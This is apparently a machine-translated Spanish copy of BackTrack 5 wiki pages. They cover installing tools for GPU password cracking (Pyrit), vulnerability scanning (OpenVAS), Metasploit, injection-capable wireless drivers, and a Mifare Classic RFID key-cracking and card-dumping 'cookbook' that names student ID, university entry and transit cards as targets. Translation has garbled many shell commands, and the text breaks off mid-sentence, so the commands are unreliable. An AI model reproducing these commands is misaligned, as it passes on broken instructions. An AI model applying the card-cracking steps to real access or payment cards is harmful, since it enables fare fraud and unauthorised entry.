root @ bt: ~ # apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla root @ bt: ~ # rm-f / usr / lib / firefox / plugins / * flash * root @ bt: ~ # rm-f / usr / lib / firefox addons-/ plugins / * flash * root @ bt: ~ # rm-f / usr / lib / mozilla / plugins / * flash * root @ bt: ~ # rm-f ~ / .mozilla / plugins / * flash * so root @ bt: ~ # rm-rfd / usr / lib / nspluginwrapper

Despus de quitar flash que necesita para obtener el reproductor de flash de nuevo el oficial [ http://www.adobe.com/software/flash/about/ sitio web]. (Descargar en formato tar.gz) Lo siguiente que se har cargo del reproductor de Flash:
root @ bt: ~ # mkdir-p ~ / .mozilla / plugins root @ bt: ~ # mkdir Flash root @ bt: ~ # mv-f install_flash_player_11_linux.i386.tar.gz flash / root @ bt: ~ # cd flash / root @ bt: ~ / flash # tar install_flash_player_11_linux.i386.tar.gz xvfz root @ bt: ~ / flash # cp-f libflashplayer.so ~ / .mozilla / plugins /

Podemos probar si funciona Flash Player aqu .

ADVERTENCIA: Asegrese de configurar correctamente o NOSCRIPT TUS VIDEOS FLASH NO FUNCIONA!

Instale OpenCL

Instale OpenCL en Backtrack


Este artculo fue contribuido por g0tmi1k. Twitter: ! https://twitter.com/ # / g0tmi1k En esta gua vamos a instalar y configurar OpenCL en Backtrack. NOTA: Es posible que tenga que hacer algunos ajustes menores en funcin de su sistema.

Empecemos: En primer lugar antes de empezar queremos asegurarnos de que nuestro sistema est actualizado.
root @ bt: ~ # apt-get update && apt-get upgrade

Antes de continuar con la instalacin de los controladores de ATI que necesitamos para que nuestro cdigo fuente del kernel preparado.
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

Ahora que estamos preparados es el momento de descargar los drivers de ATI.


root @ bt: ~ # wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # chmod + x ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # ./ati-driver-installer-11-9-x86.x86_64.run root @ bt: ~ # reboot

Antes de que termine hay una cosa ms que tenemos que instalar, el AMD Accelerated Parallel Processing (APP) SDK, ste debe ser instalado de acuerdo con la arquitectura de CPU. Para la arquitectura de 32 bits:
root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx32.tgz root @ bt:. ~ # / Install-AMD-APP.sh

Para la arquitectura de 64 bits:


root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx64.tgz root @ bt:. ~ # / Install-AMD-APP.sh

Tambin necesitaremos cmake y cmake + + junto con algunos archivos de la biblioteca. En primer lugar, instalar las bibliotecas y cmake:
root @ bt: ~ # apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Antes de poder instalar cmake + + tenemos que establecer las rutas de ATI Stream:
root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP root @ bt:. ~ # export ATISTREAMSDKROOT ">> ~ / bashrc root @ bt:. ~ # source ~ / bashrc

Ahora podemos proceder con la instalacin:


root @ bt: ~ # svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp root @ bt: ~ # cd calpp / trunk root @ bt: ~ # cmake.

root @ bt: ~ # make root @ bt: ~ # make install

Adems ahora podemos instalar Pyrit con la opcin OpenCL.


root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ / tmp / root @ bt Pyrit: ~ # cd / tmp / Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd / tmp / Pyrit / && cpyrit_opencl python setup.py construir && python setup.py install

Ahora podemos probar Pyrit.


root @ bt: ~ # Pyrit list_cores root @ bt: ~ # Pyrit punto de referencia

Recopilacin de informacin

Autoscan - Unicornscan

Autoscan

Configuracin de escaneo automtico en Backtrack 5


Cul es Autoscan? En Autoscan corto es una red de descubrimiento y gestin de aplicaciones. Su propsito principal es identificar rpidamente las mquinas conectadas / equipo en un entorno de red.

Vamos a configurar rpidamente autoscan en Backtrack5, puede encontrarlo mediante el men en: BackTrack -> Recopilacin de Informacin -> Anlisis de Red -> Red Scanners -> autoscan

Tan pronto como iniciarlo desde el men comenzaremos nuestro asistente de configuracin, haga clic en Siguiente para continuar:

Ahora vamos a configurar una nueva red y aadir nuestros propios datos haciendo clic en el botn Aadir:

Seleccione la interfaz de red (wlan0 en este caso):

Despus de que se nos pide para confirmar nuestros valores:

Aqu hay alguna salida similar a lo que se ve en algunos dispositivos:

Unicornscan

Unicornscan es un impresionante "remitente carga til", que tambin puede actuar como un escner asncrona. Gracias a dash1b y su guin impresionante parche en marcha, hemos sido capaces de implementar rpidamente las caractersticas completas del escner en BackTrack 5. Para instalar unicornscan en BackTrack 5 (si no est ya instalado), escriba:

root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install unicornscan

A continuacin, ejecute la secuencia de comandos de configuracin de postgres, que fue tomada en su mayora de http://code.google.com/p/unicornscan-bt5-install-script/ . Este script configurar el servidor PostgreSQL Framework3 como la base de datos back-end para Unicornscan. Iniciar apache, y vaya a http://127.0.0.1/unicornscan . Iniciar una exploracin utilizando la opcinepgsqldb.

Pgina Casa Foros Blog Formacin Descargas Sobre

Introduccin> Kernel> Personalizacin> Recopilacin de informacin> Vulnerabilidad Identificacin> Explotacin> Radio Network Analysis> Privilege Escalation> Telefona> Forense> Errores conocidos BackTrack Preguntas ms frecuentes

Caja de herramientas

Lo que enlaza aqu Seguimiento de enlaces Pginas especiales Versin para imprimir Enlace permanente

Vulnerabilidad de identificacin

OpenVAS

Primeros pasos con OpenVAS

Contenido
[hide] 1 Instalacin de OpenVAS 2 Ubicacin de las entradas del men OpenVAS 3 OpenVAS comprobar la configuraci n 4 Configurac in de OpenVAS 4.1 Pas o 1. A adir un usu ario 4,2 Pas o 2. Hac er el Cer tific ado 4.3 Pas o 3. La sinc roni zaci n

Instalacin OpenVAS
La forma ms sencilla de instalar todos los componentes necesarios de la suite openvas es emitir los mandatos siguientes en una ventana de terminal.
root @ bt: ~ # apt-get update root @ bt: ~ # apt-get install openvas

Los openvas paquete es un "maestro" paquete que contiene toda la informacin necesaria para descargar automticamente todos los paquetes que componen la suite completa de herramientas de openvas.

Ubicacin de las entradas del men OpenVAS


Una vez que se ha instalado openvas usted encontrar todo el de las entradas de men en esta localidad.

OpenVAS comprobar la configuracin


openvas-check-setup es una herramienta muy til, aqu se muestra cmo se puede ayudar a diagnosticar problemas y dar consejos sobre cmo solucionarlos.

Configuracin de OpenVAS
Paso 1. Aadir un usuario
En el men, seleccione OpenVAS Adduser y siga las instrucciones. Tenga en cuenta que puede utilizar cualquier nombre de usuario que quiera, pero en este caso he usado la raz. Lo he dejado en el valor predeterminado de autenticacin de contrasea como voy a usar esto en una mquina local y para evitar tener que preocuparse acerca de los usuarios que tienen certs de qu preocuparse, pero esto es totalmente de usted. No se puede tener una contrasea vaca, as que he utilizado Toor en este caso. Para las reglas que se aplican a este usuario he dejado en blanco presionando ctrl-d Esto significa que este usuario ser capaz de realizar cualquier tarea sin ningn tipo de restricciones.

Paso 2. Hacer el Certificado


En el men, seleccione OpenVAS mkcert y siga las instrucciones. Aqu vamos a crear el certificado SSL Esto se utiliza si usted decide utilizar cert lugar de paso al crear el usuario, pero estn obligados a crear todos modos, incluso si usted decide no utilizar certs.

Paso 3. La sincronizacin de la NVT


En este punto tenemos que conseguir la ltima serie de NVT. Estos son los que el analizador usa para detectar las vulnerabilidades en lo que va a escanear. Por favor, tenga en cuenta que tendr que hacer esto con bastante regularidad, y la primera vez que haces podra tardar un tiempo dependiendo de la velocidad de su ordenador y de Internet. As que seleccione OpenVAS NVT Sync en el men

Paso 4. Puesta en marcha del escner


Comience escner OpenVAS Ahora estamos listos para iniciar el escner Esto tomar un tiempo la primera vez que lo inicie como lo comprueba y carga el nuevo NVT ha descargado en el paso anterior.

Tenga en cuenta el tiempo en la esquina! Esto fue en una mquina virtual de lo que debe ser mucho ms rpido para usted. Arranques posteriores ser rpido a menos que no haya actualizado en bastante tiempo Por favor, recuerde que el escner se ejecuta como un demonio en el fondo y seguir funcionando hasta que se reinicie o pararlo con la entrada de men proporciona.

Paso 5. Configuracin OpenVAS gerente


Configuracin de administrador openvas Lo primero que tenemos que hacer es hacer un certificado de cliente para el gestor de OpenVAS, Esto se hace ejecutando el siguiente comando
openvas-mkcert-client-n om-i

ahora tenemos que reconstruir la base de datos, ya que ahora est fuera de fecha con el agregado de nvt y que de otra manera sera obtener errores sobre la base de datos. Usted debe hacer esto cada vez que actualice el de NVT. Esto se hace con un simple comando
openvasmd - rebuild

Este proceso slo tomar unos segundos si se utiliza OpenVAS bibliotecas de la versin 4.0.3 o inferior. Este proceso puede tomar mucho ms tiempo si se utiliza OpenVAS bibliotecas de la versin 4.0.5 o superior. La desventaja de este tiempo extra es mucho mayor capacidad de exploracin, por lo que vale la pena.

Paso 6. Configuracin OpenVAS Administrador


Configuracin de Administrador OpenVAS Tenemos que crear un usuario administrativo que vamos a utilizar para realizar todas evaluacin contemplaba nuestra vulnerabilidad. Esto se hace ejecutando el siguiente comando
openvasad-c 'add_user'-n-r openvasadmin administracin

openvasadmin es el nombre que he elegido para convertirse en el usuario, sin embargo, puede sustituir eso con algo ms adecuado para usted si as lo desea. Asegrese de que puede recordar este nombre de usuario y la contrasea asociada, ya que lo necesitar cuando ejecute openvas.
root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin administracin Palabra clave: anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: No hay reglas expediente previsto, el

nuevo usuario no tendr restricciones. anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: openvasadmin usuario se ha creado correctamente. root @ bt: ~ #

Iniciar el Administrador OpenVAS


Ahora tenemos que iniciar el Administrador de OpenVAS Se ejecuta como un daemon en segundo plano. Como estoy corriendo desde mi mquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecucin del siguiente comando.
openvasmd-p 9390-un 127.0.0.1

A partir Administrador OpenVAS


Ahora tenemos que iniciar el Administrador de OpenVAS Esto tambin se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi mquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecucin del siguiente comando.
openvasad-a 9.393 127.0.0.1-p

A partir Greenbone Asistente de seguridad


Ahora tenemos que empezar a Greenbone Asistente de seguridad De nuevo, esto se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi mquina local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la ejecucin del siguiente comando.
GSAD - http-only - listen = 127.0.0.1-p 9392

Ms informacin sobre estos comandos y otras opciones se pueden encontrar mediante la ejecucin de su entrada en el men asociado y mirando las pginas de manual. Como los tres de estos anlisis como un demonio y seguir funcionando hasta que se cierre su computadora, me han proporcionado las entradas de men para usted de modo que usted puede detenerlos cuando ya no los necesite. En este punto de la instalacin es prcticamente completa, pero como hemos llegado hasta aqu bien podemos seguir para asegurarse de que todo est funcionando como se esperaba.

OpenVAS interfaces de usuario


Greenbone seguridad de escritorio
Ahora tenemos que iniciar una aplicacin para que pueda comunicarse con el escner y otros demonios. La primera de estas opciones es Greenbone seguridad de escritorio

Inicie esto desde la opcin de men y rellenar las credenciales y los detalles que hemos creado anteriormente, a continuacin, haga clic en el botn de inicio de sesin. Una vez conectado usted puede utilizar esto como su interfaz de exploracin, o utilizar la opcin siguiente de que usted prefiera.

Interfaz web
El siguiente mtodo es a travs de una interfaz web Abra su navegador favorito y escriba la siguiente direccin 127.0.0.1:9392 A continuacin se le presentar una pgina de inicio de sesin. iniciar sesin con las credenciales que hemos creado antes. Una vez que haya iniciado la sesin, se dar cuenta de que su uso de la CPU se golpe el techo, no se preocupe, este volver a la normalidad en poco tiempo. Aqu puede realizar y configurar todas las tareas de escaneo. Es una buena idea establecer NoScript para permitir temporalmente 127.0.0.1 o puede obtener resultados inesperados. Hay mucho ms para OpenVAS que he incluido aqu, pero esto es slo la intencin de poner en marcha rpidamente. Analiza y configuraciones ms avanzadas estn ms all del alcance de este tutorial simple. No se olvide de algunas de las otras partes a openvas contenidos en el men que no he tratado aqu y tambin las pginas de manual.

Una vez que haya completado el proceso de configuracin


OpenVAS que comienzan con Greenbone de seguridad de escritorio como la interfaz de anlisis
En el men, seleccione OpenVAS NVT sincronizacin Comience escner OpenVAS a continuacin, en una ventana de terminal
openvasmd - rebuild openvasmd-p 9390-un 127.0.0.1 openvasad-a 9.393 127.0.0.1-p GSAD - http-only - listen = 127.0.0.1-p 9392

Luego, desde el men Comience Greenbone seguridad de escritorio y login Ahora est listo para configurar tareas de exploracin.

OpenVAS A partir de un navegador web como interfaz de escaneo


En el men, seleccione OpenVAS NVT sincronizacin Comience escner OpenVAS a continuacin, en una ventana de terminal
openvasmd - rebuild openvasmd-p 9390-un 127.0.0.1 openvasad-a 9.393 127.0.0.1-p GSAD - http-only - listen = 127.0.0.1-p 9392

A continuacin, abra su navegador a la direccin


http://127.0.0.1:9392

Login. Ahora est listo para configurar tareas de exploracin.

Metasploit Framework MySQL

Metasploit Framework con soporte MySQL Con una reciente correccin de errores, hemos simplificado los pasos necesarios para utilizar MySQL como back-end para el Metasploit Framework.
root @ bt: ~ # apt-get update root @ bt: ~ # apt-get dist-upgrade root @ bt: ~ # mysql servicio de inicio root @ bt: ~ # msfconsole

Un comando db_driver debe mostrar la disponibilidad de la opcin de MySQL:


msf> db_driver [*] Driver activo: postgresql [*] Disponible en: postgresql, mysql

msf> Vaya por delante y conectarse a la base de datos utilizando la contrasea de root por defecto de MySQL Toor:
msf> db_driver mysql [*] El uso de bases de datos mysql conductor msf> root db_connect: toor@127.0.0.1 / msf3 msf>

Radio Network Analysis

Wireless Drivers

Wireless Drivers

Con el escenario siempre cambiante del mundo del controlador inalmbrico y el mac80211 pila, hemos querido dedicar una pgina que resolver algunas configuraciones complicadas inalmbricos controladores. Antes de iniciar su viaje hacia BackTrack mundo inalmbrico, primero debe identificar el chipset de la tarjeta inalmbrica con un 100% de certeza. En caso de duda, usted siempre se puede intentar de enchufar el tarjeta en una casilla de Linux, y ver lo que dmesg tiene que decir.

Contenido
[hide] 1 BackTrack 5 r2 1.1 b43 2 BackTrack 5 r1 2,1 rt28 00u sb 3 BackTrack 5 3.1 Wir eles s Dri ver s 3 3 3.2 Tarj etas inal m bric as 3 3 3

BackTrack 5 r2
BackTrack 5 R2 contiene imgenes del kernel parcheado 3.2.6 controladores inalmbricos con varios parches de inyeccin aplicados.

b43
BackTrack 5 R2 ha pasado de b43 conductores a los conductores brcmsmac. Si necesitas habilitar los b43 controladores, siga esta gua - http://www.backtrack-linux.org/wiki/index.php? title=Enable_b43_drivers_in_Backtrack5_r2 .

BackTrack 5 r1
BackTrack 5 R1 contiene parches del kernel 2.6.39.4 del stock controladores inalmbricos con varios parches de inyeccin aplicados. Dependiendo de la tarjeta y la configuracin, estos controladores no le conviene.

rt2800usb
En algunos casos hemos visto las tarjetas que utilizan los controladores rt2800usb (como el AWUS036NH y Alfs AWUS036NEH) actuar extrao con el kernel BT5R1. Si esto le sucede a usted, usted puede intentar instalar un reciente compat-wireless y construir por su cuenta. Esta versin especfica funcionar:
root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build root @ bt: ~ # cd / usr / src / root root root root root root root root root root root @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: @ bt: ~ # tar jxpf compat-wireless-2011-07-14.tar.bz2 ~ # wget http://www.backtrack-linux.org/2.6.39.patches.tar ~ # tar xpf 2.6.39.patches.tar ~ # cd compat-wireless-2011-07-14 ~ # patch-p1 <.. / patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch ~ # patch-p1 <.. / patches/mac80211.compat08082009.wl_frag + ack_v1.patch ~ # patch-p1 <.. / patches/zd1211rw-2.6.28.patch ~ # patch-p1 <.. / patches/ipw2200-inject.2.6.36.patch ~ # make ~ # make install ~ # reboot

BackTrack 5
BackTrack 5 contiene imgenes del kernel 2.6.38 parcheado controladores inalmbricos, as como varios conductores "externos". Algunos de estos controladores se solapan, para proporcionar una flexibilidad mxima con varios ataques inalmbricos. El archivo / etc / modprobe.d / blacklist dicta que los conductores preferidos se cargan al arrancar el sistema. En trminos generales, todos los conductores de edad avanzada IEEE estn en listas negras y tienen que cargarse manualmente si quieres usarlos.

Wireless Drivers
rtl8187 vs r8187
Esto es confuso. El rtl8187 es el conductor de pila mac80211, mientras que el r8187 es el antiguo controlador IEEE. Tanto el apoyo de la inyeccin. Los ms nuevos mac80211 RTL8187 conductores parecen tener un desagradable error en VMWare. Para obtener ms informacin acerca de estos controladores visite nuestro rtl8187 vs r8187 pgina.

compat wireless
Como Linux controladores inalmbricos maduro, ms chipsets se aaden a la lista de compatibilidad. Si ninguno de los controladores del ncleo nativo BackTrack trabajar para usted, es posible que desee considerar el uso de una versin ms reciente de compat-wireless. Echa un vistazo a la compat-wireless pgina para obtener informacin sobre cmo obtener los drivers y funcionando.

Tarjetas inalmbricas
ESTA LISTA DEBE SER ACTUALIZADO PARA BT5.

Tarjetas Probado y de trabajo


Hemos sido capaces de poner a prueba las siguientes tarjetas. Tenga en cuenta que "pas" significa "pasar un aireplay -9" prueba de inyeccin. Estaremos ampliando esta lista a medida que ms cpulas de retroalimentacin forman la comunidad. De nuestras pruebas hemos encontrado que los conjuntos de chips ms importantes fueron apoyados, as como las tarjetas ms comunes. AWUS036H (rtl8187, r8187) - ambos pilotos mac80211 y IEEE - aprobada AWUS036NH (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada BCM4312 802.11b / g LP-PHY (rev 01) - usando el mac80211 b43, funciona bien - aprob N3 Rockland - (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada Edimax EW-7318USg USB - (Ralink RT2501/RT2573) - usando los drivers mac80211 rt2500usb/rt73usb - aprobada Asustek Computer, Inc. RT2573 - usando los drivers mac80211 rt2500usb/rt73usb - aprobada Linksys WUSB54GC ver 3 - utilizando los drivers mac80211 rt2800usb - aprobada Ubiquiti SRC - usando el ath9k mac80211 conductores de paso obligatorio Interna Intel Corporation PRO / Wireless 3945ABG - usando el iwl3945 mac80211 conductores de paso obligatorio Dlink WNA-2330 PCMCIA - usando el ath5k mac80211 conductores de paso obligatorio Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) usando el ath9k mac80211 conductores de paso obligatorio Netgear WG111v2 - usando el rtl8187 mac80211 conductores de paso obligatorio ZyXEL AG-225H v2 - utilizando los drivers mac80211 ZD1211 - aprobada Intel 4956/5xxx - utilizando los controladores iwlagn - aprobada

Trabajo, sin inyeccin


Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03) Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)

NO tarjetas de trabajo
D-Link DWL-122 - utilizando los drivers mac80211 prism2_usb - fail Linksys WUSB600N v2 - utilizando los drivers mac80211 rt2800usb - fail AWUS051NH - fail

RFID Mifare Classic Cocinando con

Este artculo fue contribuido por MI1. URL: http://hack4fun.eu Twitter: ! http://twitter.com/ # / mi1c00k Email: fblubr@gmail.com

Contenido
[hide] 1 RFID Mifare Classic Cocinando con 2 0x00 Prefacio 2.1 De pen den cias 3 0x01 Hardware 3,1 tou cha tag AC R1 22 U 4 0x02 Software 4,1 AC R1 22 U con duc tor 4,2 de cd igo abi erto Nea r Fiel d Co mm

RFID Mifare Classic Cocinando con


DESCARGO DE RESPONSABILIDAD: La informacin y la implementacin de referencia se proporciona: Para fines informativos nicamente como parte de estudios acadmicos o de investigacin, especialmente en el campo de la seguridad de informacin, criptografa y sistemas de seguridad Tal cual, sin ningn tipo de garanta, el apoyo o la responsabilidad - de los daos o consecuencias obtenidas como resultado de la consulta de esta informacin si puramente del lado del lector NO deben utilizarse en circunstancias ilegales (por ejemplo, para abusos, hack o truco de un sistema que el lector no tiene autorizacin especfica a como los sistemas de venta de entradas, transporte pblico, tarjetas de Universidad / CIIU, la construccin de sistemas de acceso o sistemas que utilizan ningn tipo Mifare Classic como La tecnologa de ncleo) NOTAS: Este artculo contiene ninguna investigacin original. Toda la investigacin y la aplicacin fue hecha por otras personas y las comunidades, y est disponible al pblico. Hicimos esto dos centavos por diversin y porque amamos BackTrack. Esto no es una gua AZ fin de tratar ms duro!

0x00 - Prlogo
Algunos de ustedes pueden haber ledo que el propio algoritmo simtrico de claves criptogrficas de la tarjeta MIFARE Classic se ha roto. La tarjeta MIFARE Classic se utiliza en los sistemas de control de acceso fsico (PACS) y los sistemas de pago sin contacto (incluyendo peaje y sistemas de transporte pblico). Segn algunas estimaciones, hay 500 millones de tarjetas MIFARE desplegados en todo el mundo, y la mayora de ellos son las tarjetas MIFARE Classic.

Mifare Classic es un bajo costo, de nivel de entrada chip, basado en la norma ISO / IEC 14443 Tipo A, 1kB o 4KB. Utiliza el estndar de 13,56 Mhz tarjeta inteligente sin contacto, CRYPTO1 propietario con 48 teclas bits. No hay proteccin contra la clonacin o modificaciones. Cualquier persona con 50 lector puede usar esta debilidad contra su infraestructura. Al menos un sector siempre se cifra con la clave por defecto. Despus de agrietamiento todas las claves, los hackers son capaces de cambiar el nombre, nmero de estudiantes universitarios, la fecha de caducidad ... Este libro de cocina es una prueba de concepto de lo fcil que se puede hacer. Ingredientes elegidos: Backtrack | touchatag paquete inicial Probado en: BackTrack 4 R2, BackTrack 5 Final, (32 bits)

Dependencias
root @ bt: ~ # apt-get install flex libpcsclite-dev libusb-dev checkinstall

0x01 - Hardware
Touchatag - ACR122U
Touchatag es ACS ACR122 (U) NFC lector RFID USB Reader. El lector USB funciona a 13,56 MHz (alta frecuencia RFID) y tiene una distancia de lectura de aproximadamente 4 cm (1 pulgada) cuando se utiliza con las etiquetas RFID touchatag. Este producto est fabricado por Advanced Card Systems Limited y parece estar disponible en diferentes configuraciones de hardware, pero no difiere mucho. Todos ellos estn usando un chip NFC PN532 Controller y una unidad ST7 microcontrolador.

0x02 - Software
ACR122U conductor
root @ bt: ~ # wget http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # unzip-d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip root @ bt: ~ # cd acr122u root @ bt: ~ # tar-jxvf acsccid-1.0.2.tar.bz2 root @ bt: ~ # cd acsccid-1.0.2 root @ bt:. ~ # / configure root @ bt: ~ # make root @ bt: ~ # checkinstall-D-y - instalar

Open Source Near Field Communication (NFC) Library / LIBNFC /


Libnfc es la primera libre SDK y API NFC Programadores publicado bajo la licencia GNU Lesser General Public.
root @ bt: ~ # apt-get install-y debhelper && libtool wget http://libnfc.googlecode.com/files/libnfc1.4.2.tar.gz root @ bt: ~ # tar xfvz libnfc-1.4.2 tar.gz. && cd libnfc-1.4.2 root @ bt: ~ # svn checkout http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian root @ bt: ~ # dpkg-buildpackagerfakeroot root @ bt:. ~ # dpkg-i .. / libnfc * deb

Revise su lector / target con nfc-list.


root @ bt: ~ # nfc-list nfc-list uso libnfc 1.4.2 (r891) Conectado al dispositivo NFC: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07) 1 ISO14443A objetivo pasiva (s) fue encontrado: ATQA (SENS_RES): 00 02 UID (NFCID1): xx xx xx xx SAK (SEL_RES): 18

Si el lector es rechazada por el firmware (mensaje de registro: "Firmware (xy) es falso") acaba de desactivar la comprobacin de versin. Todo lo que necesitas hacer es cambiar ifdDriverOptions (lnea 55 en Info.plist) para omitir la comprobacin de versin de esta manera:

root @ bt: ~ # nano / usr / lib / pcsc / drivers / IFD-ccid.bundle / Contenidos / Info.plist ifdDriverOptions 0 0005

A continuacin, reinicie el demonio pcscd y su lector touchatag deben ser reconocidos y listo.

MFOC-Mifare Classic Cracker Desconectado


Mifare Classic Desconectado Cracker es una herramienta que puede recuperar claves de tarjetas Mifare Classic. Gracias a Norbert Szetei y Luptak Pavol para la implementacin de su ataque. MFOC es utilidad para calcular (crack) todas las teclas (A y B) para todos los sectores, proporcionando al menos una de las claves que ya se conoce. Archivo de claves es el archivo donde se almacenar mfoc teclas rotas. Formato de archivo que sea compatible con la tecnologa NFC mfclassic, as que usted puede utilizar para deshacerse de la tarjeta en un archivo o escribir un volcado en la tarjeta.
root @ bt: ~ # wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar-xvzf mfoc0.10.2.tar.gz root @ bt: ~ # cd mfoc-0.10.2 root @ bt: ~ # autoreconf-vis root @ bt:. ~ # / configure root @ bt: ~ # make root @ bt: ~ # checkinstall-D-y - instalar

0x03 - Dumping y Cocina


psscd coordina la carga de los drivers para lectores de tarjetas. Permite a las aplicaciones acceder a tarjetas inteligentes y lectores sin conocer los detalles de la tarjeta o el lector. Es un gestor de recursos que coordina las comunicaciones con lectores de tarjetas inteligentes y las tarjetas inteligentes y tokens criptogrficos que estn conectadas al sistema. Yo prefiero empezar pcscd en primer plano (sin demonio) con pcscd-f. Entonces es el momento de empezar a mfoc. Usar nmero elevado de sondas, porque el nmero predeterminado de sondas para una clave de recuperacin para un sector es 20. Craqueo enteras podran tardar de 30 minutos a 30 horas.

Tambin puede utilizar el parmetro-k clave, para agregar una clave a la lista de claves conocidas, que est siendo juzgado en contra de su tarjeta en la fase inicial. La opcin-k de alguna manera no me funcion, as que siempre compilar mis claves conocidas directamente en Buscar mfoc.c "Matriz de teclas por defecto Mifare Classic" No estoy seguro acerca de otros pases, pero en el pas donde vivo teclas son las mismas . Una vez que tenga las llaves de todos los sectores, debe ser capaz de utilizar RFID-Fu contra otras tarjetas, lo cual es epic fail.
root @ bt: ~ # nfc-mfclassic - ayuda Uso: nfc-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]

r | w - Realizar leer (r) o escribir (w) tarjeta A | B - Utilice las teclas A o B para la accin <dump.mfd> - Dump MiFare (MFD) que se utiliza para escribir (tarjeta de MFD) o (MFD a la tarjeta) <keys.mfd> - MiFare Dump (MFD) que contienen las teclas (opcional) O bien: nfc-mfclassic x <dump.mfd> <payload.bin> x - Extracto de carga til (bloques de datos) de MFD <dump.mfd> - MiFare Dump (MFD) que contiene la carga til quera <payload.bin> - Binary carga de archivos donde se extraern

Tenga en cuenta que los UID de la tarjeta no se ver afectada (no cambia) con este proceso. Compre algunas tarjetas en blanco o III Proxmark si eso es lo que quieres. Si usted est pensando ahora vertido su monedero electrnico inmediatamente despus de la recarga y cuando el crdito llega a cero, escribir el contenido de nuevo, por favor, no lo hagas. Qu se puede dejar de hacer eso? Bueno, probablemente slo su conciencia, pero si la tarjeta se bloquea en 24 horas despus del primer uso y luego no te quejes. S, hay control en lnea y facturacin de los sistemas que hay para tarjetas bsicas.

0x04 - ISIC Issue


Con ISIC-International Student Identity Card atacante puede abusar de las diez de servicio no slo uno. Tarjetas ISIC son ampliamente utilizados para el transporte de entrada, comedor, pagos y servicios varios otros o descuentos. De acuerdo a la pgina principal hay 4,5 millones de tarjetahabientes en 120 pases. Las tarjetas deben ser sustituidas por otras ms seguras tipos ASAP. Se puede hacer mucho ms que eso, pero suficiente para la demostracin vamos a jugar un poco ... En algunas universidades, slo hay un control de seguridad de la entrada - ISIC. Como se puede ver que esto es trivial que quiere evitar. Hicimos muchas pruebas con los sistemas de transporte pblico y con los sistemas universitarios. Los resultados son todos iguales - esos sistemas son fciles de piratear.

0x06 - Conclusin
Por ltimo, cundo la gente a aprender la leccin? Los algoritmos criptogrficos deben ser pblicos para que puedan ser analizado y probado. Algoritmos secretos no son ms valiosos porque son secretos. Cualquier persona que necesite una tarjeta inteligente alta seguridad debe asegurarse de que hay seguridad en capas y no slo depende de la encriptacin del chip.

0x07 - Qu ser lo prximo?


Desde que tengo acceso a Proxmark III, que es universal herramienta de hacking RFID que puede ser utilizado por el 100% de clonacin precisa (incluso UID), i una vez puede escribir acerca de la segunda edicin c00king con Mifare Classic y Prox HID ... Armado con BackTrack GSM ataque suite?

0x08 - Gracias
Este libro de cocina fue hecha con gran ayuda de los chicos h4f, muchas gracias a Vulcano y Atrs.

0x09 - Referencias y enlaces


Para leer ms acerca de este tema, por favor vea lo siguiente: http://www.cs.virginia.edu/ ~ kn5f/pdf/K.Nohl.PhD Implementable.Privacy.for.RFID.Systems.pdf http://events.ccc.de/congress/2007/Fahrplan/events/2378.en.html http://packetstorm.rlz.cl/papers/wireless/2008-esorics.pdf http://www.nethemba.com/mifare-classic-slides.pdf http://code.google.com/p/nfc-tools/wiki/mfoc

0x0A - Acerca de
MI1 es un "entusiasta plena seguridad tiempo" con ttulo universitario en el campo de la informtica. Recientemente centrando su pasin por cosas USRP y RFID.

Privilege Escalation

CUDA en BackTrack 5

CUDA en BackTrack 5

Esta gua es un trabajo en progreso, y est diseada para ayudar a aquellos que necesitan obtener CUDA trabajando en sus mquinas inversas. Comience por la preparacin de sus fuentes del ncleo para la instalacin del controlador Nvidia:
root @ bt: ~ # preparar-kernel-sources root @ bt: ~ # cd / usr / src / linux root @ bt: ~ # cp-rf include / genera / * include / linux /

Descargar drivers de Nvidia de acuerdo con la arquitectura de CPU: 32 64 Asegrese de que no est en una sesin X (cerrar la sesin a la consola), y ejecutar el instalador del

